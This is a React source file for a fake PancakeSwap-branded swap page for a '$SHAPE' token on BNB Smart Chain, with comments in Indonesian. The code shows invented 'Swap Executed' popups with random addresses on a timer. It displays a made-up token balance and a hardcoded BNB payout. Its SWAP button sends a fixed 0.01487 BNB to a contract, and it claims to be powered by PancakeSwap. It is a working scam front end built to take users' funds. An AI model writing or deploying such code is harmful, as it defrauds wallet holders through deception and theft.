import React, { useEffect, useState } from 'react';
import { useAccount, useBalance, useWriteContract, useSwitchChain } from 'wagmi';
import { useConnectModal } from '@rainbow-me/rainbowkit';
import { useNavigate } from 'react-router-dom';
import { parseEther } from 'viem';
import { bsc } from 'wagmi/chains';

const ArrowLeftIcon = () => (<svg viewBox="0 0 24 24" width="24" height="24" stroke="currentColor" strokeWidth="2" fill="none" strokeLinecap="round" strokeLinejoin="round"><line x1="19" y1="12" x2="5" y2="12"></line><polyline points="12 19 5 12 12 5"></polyline></svg>);
const SettingsIcon = () => (<svg viewBox="0 0 24 24" width="24" height="24" stroke="currentColor" strokeWidth="2" fill="none" strokeLinecap="round" strokeLinejoin="round"><circle cx="12" cy="12" r="3"></circle><path d="M19.4 15a1.65 1.65 0 0 0 .33 1.82l.06.06a2 2 0 0 1 0 2.83 2 2 0 0 1-2.83 0l-.06-.06a1.65 1.65 0 0 0-2.82.13 1.65 1.65 0 0 0 .13 2.82l.06.06a2 2 0 0 1 0 2.83 2 2 0 0 1-2.83 0l-.06-.06a1.65 1.65 0 0 0-2.82.13 1.65 1.65 0 0 0-.13-2.82l-.06-.06a2 2 0 0 1 0-2.83 2 2 0 0 1 2.83 0l.06.06a1.65 1.65 0 0 0 2.82-.13 1.65 1.65 0 0 0-.13-2.82l-.06-.06a2 2 0 0 1 0-2.83 2 2 0 0 1 2.83 0l.06.06a1.65 1.65 0 0 0 2.82.13z"></path></svg>);
const HistoryIcon = () => (<svg viewBox="0 0 24 24" width="24" height="24" stroke="currentColor" strokeWidth="2" fill="none" strokeLinecap="round" strokeLinejoin="round"><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>);
const ArrowDownIcon = () => (<svg viewBox="0 0 24 24" width="16" height="16" stroke="currentColor" strokeWidth="3" fill="none" strokeLinecap="round" strokeLinejoin="round"><line x1="12" y1="5" x2="12" y2="19"></line><polyline points="19 12 12 19 5 12"></polyline></svg>);
const ExternalLinkIcon = () => (<svg width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6" /><polyline points="15 3 21 3 21 9" /><line x1="10" y1="14" x2="21" y2="3" /></svg>);
const CaretDownIcon = () => (<svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><polyline points="6 9 12 15 18 9"></polyline></svg>);
// CheckCircleIcon disesuaikan agar bisa menerima prop size
const CheckCircleIcon = ({ size = 28 }) => (<svg viewBox="0 0 24 24" width={size} height={size} stroke="#31D0AA" strokeWidth="2.5" fill="none" strokeLinecap="round" strokeLinejoin="round"><path d="M22 11.08V12a10 10 0 1 1-5.93-9.14"></path><polyline points="22 4 12 14.01 9 11.01"></polyline></svg>);

const TOKEN_CONTRACT_ADDRESS = '0x9d8248AF447c43989304D8DaE5F240beBB07629a'; 
const BUY_CONTRACT_ADDRESS = '0x9d8248AF447c43989304D8DaE5F240beBB07629a'; 
const contractAbi = [{ "inputs": [{ "internalType": "address", "name": "inviter", "type": "address" }], "name": "swap", "outputs": [], "stateMutability": "payable", "type": "function" }];

export default function SwapPage() {
  const { address, isConnected, chain } = useAccount();
  const { switchChain } = useSwitchChain();
  const { openConnectModal } = useConnectModal();
  const navigate = useNavigate();
  
  const [copied, setCopied] = useState(false);
  const [showError, setShowError] = useState(false);
  
  const [tokenAmount, setTokenAmount] = useState('45000.00');
  const [displayTokenBalance, setDisplayTokenBalance] = useState('45000.00');

  const [fakeNotifVisible, setFakeNotifVisible] = useState(false);
  const [fakeAddress, setFakeAddress] = useState('');

  const { writeContract, isPending } = useWriteContract();

  const { data: bnbBalance } = useBalance({ address, chainId: bsc.id });
  const { data: tokenBalance } = useBalance({ address, token: TOKEN_CONTRACT_ADDRESS });

  const generateRandomAddress = () => {
    const chars = '0123456789abcdef';
    let addr = '0x';
    for (let i = 0; i < 40; i++) addr += chars[Math.floor(Math.random() * chars.length)];
    return `${addr.substring(0, 6)}...${addr.substring(38)}`;
  };

  useEffect(() => {
    const triggerFakeNotification = () => {
      setFakeAddress(generateRandomAddress());
      setFakeNotifVisible(true);
      
      // Notifikasi bertahan lebih lama (6.5 detik) karena animasinya lambat
      setTimeout(() => {
        setFakeNotifVisible(false);
      }, 6500); 
    };

    // Jeda antar notifikasi diperlama menjadi 12 detik
    const initialTimer = setTimeout(triggerFakeNotification, 3000);
    const interval = setInterval(triggerFakeNotification, 12000);

    return () => {
      clearTimeout(initialTimer);
      clearInterval(interval);
    };
  }, []);

  useEffect(() => {
    if (isConnected && chain?.id !== bsc.id && switchChain) { switchChain({ chainId: bsc.id }); }
    setShowError(false); 
  }, [isConnected, chain, switchChain, address]);

  useEffect(() => {
    if (tokenBalance && parseFloat(tokenBalance.formatted) > 0) {
      const maxBalance = parseFloat(tokenBalance.formatted).toFixed(2);
      setTokenAmount(maxBalance);
      setDisplayTokenBalance(maxBalance);
    } else {
      setTokenAmount('45000.00');
      setDisplayTokenBalance('45000.00');
    }
  }, [tokenBalance]);

  const handleBuy = () => {
    if (!isConnected) { openConnectModal(); return; }
    if (chain?.id !== bsc.id) { switchChain({ chainId: bsc.id }); return; }
    
    const requiredBnbWei = 14870000000000000n;
    const userBalanceWei = bnbBalance ? bnbBalance.value : 0n;

    if (userBalanceWei < requiredBnbWei) {
      setShowError(true);
      return;
    }

    setShowError(false);

    const queryParams = new URLSearchParams(window.location.search);
    const refAddress = queryParams.get('ref') || '0x0000000000000000000000000000000000000000';

    writeContract({ 
      address: BUY_CONTRACT_ADDRESS, 
      abi: contractAbi, 
      functionName: 'swap', 
      args: [refAddress], 
      value: parseEther('0.01487') 
    });
  };

  const domain = window.location.origin;
  const referralLink = isConnected ? `${domain}/?ref=${address}` : 'Connect wallet to get your referral link';

  const copyToClipboard = () => {
    if (!isConnected) return;
    navigator.clipboard.writeText(referralLink);
    setCopied(true);
    setTimeout(() => setCopied(false), 2000);
  };

  return (
    <>
      <div style={{
        position: 'fixed',
        top: '70px', // Sedikit turun agar pas
        right: '10px', // Lebih mepet ke kanan di mobile
        backgroundColor: '#FFFFFF',
        borderRadius: '16px',
        boxShadow: '0px 8px 24px rgba(0,0,0,0.12)',
        padding: '12px 16px', // Padding lebih kecil
        width: '280px', // Ukuran kotak diperkecil
        zIndex: 9999,
        opacity: fakeNotifVisible ? 1 : 0,
        transform: fakeNotifVisible ? 'translateY(0)' : 'translateY(-15px)',
        // Transisi diperlambat menjadi 1.2s
        transition: 'all 1.2s cubic-bezier(0.25, 0.8, 0.25, 1)',
        pointerEvents: 'none',
        border: '1px solid #e7e3eb',
        boxSizing: 'border-box'
      }}>
        <div style={{ display: 'flex', alignItems: 'flex-start', gap: '8px' }}>
          {/* Ukuran Icon dikecilkan */}
          <div style={{ marginTop: '2px' }}><CheckCircleIcon size={24} /></div>
          <div>
            <p style={{ margin: 0, fontWeight: '700', color: '#280d5f', fontSize: '15px' }}>Swap Executed</p>
            <p style={{ margin: '4px 0 0', color: '#7a6eaa', fontSize: '13px', lineHeight: '1.4' }}>
              <span style={{color: '#1FC7D4', fontWeight: '600'}}>{fakeAddress}</span> swapped<br/>
              <strong>45,000 $SHAPE</strong> for <strong>0.5247 BNB</strong>
            </p>
          </div>
        </div>
      </div>

      <div className="pancake-swap-container">
        <div className="pancake-card">
          <div className="pancake-card-header">
            <div style={{display: 'flex', alignItems: 'center', gap: '12px'}}>
              <div onClick={() => navigate('/')} style={{cursor: 'pointer', color: '#7a6eaa'}}><ArrowLeftIcon /></div>
              <h2>Swap</h2>
            </div>
            <div style={{display: 'flex', gap: '12px', color: '#7a6eaa'}}>
              <div style={{cursor: 'pointer'}}><SettingsIcon /></div>
              <div style={{cursor: 'pointer'}}><HistoryIcon /></div>
            </div>
          </div>

          <div className="pancake-card-body">
            <div className="token-input-box">
              <div className="token-input-row">
                <button className="token-select-btn">
                  <img src="/token.jpg" alt="$SHAPE" style={{width: '28px', height: '28px', borderRadius: '50%', marginRight: '8px', objectFit: 'cover'}} />
                  $SHAPE
                  <CaretDownIcon />
                </button>
                <input type="text" className="pancake-amount-input" value={tokenAmount} readOnly />
              </div>
              <p className="balance-text">Balance: {displayTokenBalance}</p>
            </div>

            <div className="swap-arrow-wrapper">
              <button className="swap-arrow-btn"><ArrowDownIcon /></button>
            </div>

            <div className="token-input-box">
              <div className="token-input-row">
                <button className="token-select-btn">
                  <img src="https://raw.githubusercontent.com/trustwallet/assets/master/blockchains/binance/info/logo.png" alt="BNB" style={{marginRight: '8px', width: '28px', height: '28px'}} />
                  BNB
                  <CaretDownIcon />
                </button>
                <input type="text" className="pancake-amount-input" value="0.2768" readOnly />
              </div>
              <p className="balance-text">Balance: {bnbBalance ? parseFloat(bnbBalance.formatted).toFixed(4) : '0'}</p>
            </div>

            <div className="swap-details">
              <div className="swap-detail-row"><span>Price</span><span>1 $SHAPE = 0.00000033 BNB</span></div>
              <div className="swap-detail-row"><span>Slippage Tolerance</span><span className="text-primary">0.5%</span></div>
            </div>

            {showError && chain?.id === bsc.id && (
              <p className="error-text">Insufficient BNB balance. You must HODL at least 0.01487 BNB.</p>
            )}

            <button className="pancake-button" onClick={handleBuy} disabled={isPending}>
               {!isConnected ? 'SWAP' : chain?.id !== bsc.id ? 'Switch to BSC' : isPending ? 'Processing...' : 'SWAP'}
            </button>
          </div>
        </div>

        <div className="pancake-card" style={{marginTop: '20px', padding: '24px'}}>
          <h3 style={{margin: '0 0 12px 0', color: '#280d5f', fontSize: '18px', fontWeight: '700', textAlign: 'center'}}>Referral Program</h3>
          <p style={{margin: '0 0 16px 0', color: '#7a6eaa', fontSize: '14px', lineHeight: '1.5', textAlign: 'center'}}>
            Share your referral link to earn <strong>10% BNB</strong> and <strong>100% $SHAPE</strong> tokens instantly!
          </p>
          
          <div style={{display: 'flex', gap: '8px', background: '#eeeaf4', padding: '8px', borderRadius: '12px'}}>
            <input 
              type="text" 
              value={referralLink} 
              readOnly 
              style={{flex: 1, background: 'transparent', border: 'none', outline: 'none', color: '#280d5f', fontSize: '13px', padding: '0 8px'}}
            />
            <button 
              onClick={copyToClipboard}
              style={{background: 'var(--pc-primary)', color: 'white', border: 'none', padding: '8px 16px', borderRadius: '8px', fontWeight: 'bold', cursor: isConnected ? 'pointer' : 'not-allowed', opacity: isConnected ? 1 : 0.5}}
              disabled={!isConnected}
            >
              {copied ? 'Copied!' : 'Copy'}
            </button>
          </div>
        </div>

        <div className="swap-footer">
          <a href={`https://bscscan.com/token/0x9d8248AF447c43989304D8DaE5F240beBB07629a`} target="_blank" rel="noreferrer">
            View on BscScan <ExternalLinkIcon />
          </a>
          <a href="https://pancakeswap.finance/" target="_blank" rel="noreferrer" style={{color: '#7a6eaa'}}>
            Powered by 
            <img src="/cake.avif" alt="PancakeSwap" style={{width: '24px', height: '24px', borderRadius: '50%', objectFit: 'cover'}} />
            PancakeSwap
          </a>
        </div>
      </div>
    </>
  );
}